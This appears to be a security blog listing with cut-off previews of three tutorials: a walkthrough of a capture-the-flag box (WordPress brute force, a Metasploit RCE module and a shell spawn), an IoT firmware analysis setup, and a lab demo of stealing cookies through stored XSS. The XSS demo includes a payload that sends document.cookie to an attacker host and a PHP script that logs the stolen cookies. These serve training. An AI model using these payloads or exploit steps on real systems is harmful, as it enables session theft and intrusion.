Cyber Security | Web Development

 Step 1: Gather Information: nmap scan           Open Ports, Version, FTP, SMB, RDP  Step 2: Gather Information: Directory Enumeration gobuster dir -u http://10.10.126.45 -w /usr/share/wordlists/dirb/big.txt -s 200,204,301,302,307,308 --status-codes-blacklist "" -t 20 -o blog.th Step 3: WPScan  wpscan --url http://blog.thm/ --enumerate p --enumerate t --enumerate u > wpscan_output.txt cat  Step 4: Brute-force Username & Password Step 5: Password taken from rockyou.txt wpscan --url http://blog.thm/ -P /root/Documents/Wordlists/rockyou.txt -U /root/usr.txt --verbose > UserEnumer.txt Step 6: Metasploitable use exploit/multi/http/wp_crop_rce set rhosts 10.10 . 109 . 33 set username kwheel set password cutiepie1 set LHOST <My_Machine_IP> run shell python -c 'import pty; pty.spawn("/bin/bash")' id Step 7:  Inside "Shell" - Walkthrough folder files access cd /home ls cd bjoel ls cat user. txt download /home/bjoel/Billy_Joe...

iOT Security Assessment Step 1: Install on your linux machine: Tools Pre-requisite: 1. hexdump hexdump is a Unix command-line tool that displays the raw byte content of a file in hexadecimal (hex) and sometimes ASCII format. It’s commonly used for analyzing binary files, firmware, memory dumps, or even debugging data structures. 2. binwalk + squashfs Binwalk is a powerful forensic and reverse engineering tool used primarily for analyzing and extracting firmware images. It's widely used in embedded device security testing, firmware analysis, and reverse engineering. 3. firmadyne Firmadyne is an automated firmware emulation and dynamic analysis framework designed to help security researchers emulate, instrument, and analyze Linux-based firmware images, especially for embedded devices like routers, IP cameras, and smart home devices. Step 2: Get the device and extract the firmware file. Let's assume we have a  Netgear IOT device model number is WNAP 320, extracted firmware.b...

Cookie Stealing via XSS Stored Vulnerability  Configuration: sudo nano /etc/hosts Victim Application: Step 1: Create and paste the code into index.html file <!DOCTYPE html> <html> <head><title>Test</title></head> <body>   <h1>Hello from test.local!</h1>   <a onclick="document.location='http://attacker.local:8080/steal.php?cookie=' + escape(document.cookie);" href="#">Click me</a>  <script>     // Set a test cookie     document.cookie = "session=ABC123"; </script> </body> </html> Run Command: sudo python3 -m http.server 80  Attacker Code: <?php if (isset($_GET['cookie'])) {     file_put_contents("log.txt", $_GET['cookie'] . "\n", FILE_APPEND | LOCK_EX);     header("Location: http://0.0.0.0/index.html");     exit(); } ?> Save as steal.php Run Command:  sudo php -S 0.0.0.0:8080 Finally, we successfully stole t...